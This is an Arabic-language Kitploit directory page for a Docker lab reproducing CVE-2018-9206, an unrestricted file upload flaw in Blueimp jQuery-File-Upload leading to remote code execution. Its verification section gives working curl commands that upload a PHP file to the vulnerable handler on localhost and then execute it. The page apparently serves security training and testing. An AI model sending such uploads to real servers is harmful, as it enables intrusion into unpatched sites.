Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-9206-jquery-file-upload — بيئة مختبرية قائمة على Docker لثغرة CVE-2018-9206 (رفع ملفات غير مقيد في Blueimp jQuery-File-Upload يؤدي إلى تنفيذ أوامر عن بُعد RCE) مع نصوص برمجية لإثبات المفهوم (PoC) وأوامر للتحقق. | Kitploit
أدوات/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

بيئة مختبرية قائمة على Docker لثغرة CVE-2018-9206 (رفع ملفات غير مقيد في Blueimp jQuery-File-Upload يؤدي إلى تنفيذ أوامر عن بُعد RCE) مع نصوص برمجية لإثبات المفهوم (PoC) وأوامر للتحقق.

عرض المستودع
11منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-9206 - معمل Blueimp jQuery-File-Upload

بيئة Docker قابلة للاختراق لـ CVE-2018-9206 - رفع ملفات غير مقيد في Blueimp jQuery-File-Upload <= 9.22.0.

بدء سريع

root@kitploit:~
docker compose up -d --build

التطبيق متاح على: http://localhost:8888/jQuery-File-Upload/

التحقق

root@kitploit:~
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED

أو شغّل سكربت PoC:

root@kitploit:~
./scripts/poc.sh

التنظيف

root@kitploit:~
docker compose down -v

التفاصيل

الحقلالقيمة
CVECVE-2018-9206
المنتجBlueimp jQuery-File-Upload
الإصدار9.22.0
النوعرفع ملفات غير مقيد → RCE
CVSS9.8 (حرجة)

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
تنزيل الأداة